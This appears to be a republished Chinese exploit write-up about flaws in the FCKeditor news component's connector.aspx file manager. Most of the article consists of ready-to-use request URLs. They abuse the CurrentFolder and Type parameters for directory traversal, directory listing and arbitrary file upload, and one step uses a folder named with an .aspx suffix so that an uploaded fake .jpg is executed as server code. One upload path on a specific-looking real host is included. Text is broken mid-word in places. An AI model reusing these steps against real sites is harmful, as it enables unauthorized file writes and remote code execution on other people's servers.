脚本宝典收集整理的这篇文章主要介绍了FCKeditor 新闻组件的一些程序漏洞,脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
1
currentFolder 参数,可以在网站中不同目录新建文件夹,参数使用
../../来篡改参数,进入不同的目录
/
browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&
amp;Ty
PE=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp
2 CurrentFolder 参数,根据返回的
XML信息可以查看网站所有的目录,比如 “../../../”进入不同的目录,让后通过X
ML返回的消息就可以看到没有权限的页面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAn
DFiles&Type=Image&CurrentFolder=%2F
3 上
传文件时,通过修改CurrentFolder参数,可以将文件上传到不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F
4 同时修改Type 和CurrentFolder 参数,可以上传任意类型文件到网站任意目录,基本上网站就完蛋了。
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F
http://samsungfriend.local.opentide
.COM.cn/upload/
fckroots/Image/asp.asp/asp.asp
5 通过创建文件夹的功能,创建名字带有.aspx的文件夹,如:file.aspx等,
利用文件解析漏洞,在该文件夹下上传有代码的.
jpg 或.rar等文件(实际文件是.aspx,把文件名该后缀),上传之后就可以利用漏洞执行代码了。 如:www.xxx.com/upload/file.aspx/123.jpg 输入之后,代码被成功执行。
脚本宝典总结
以上是脚本宝典为你收集整理的FCKeditor 新闻组件的一些程序漏洞全部内容,希望文章能够帮你解决FCKeditor 新闻组件的一些程序漏洞所遇到的问题。
如果觉得脚本宝典网站内容还不错,欢迎将脚本宝典推荐好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。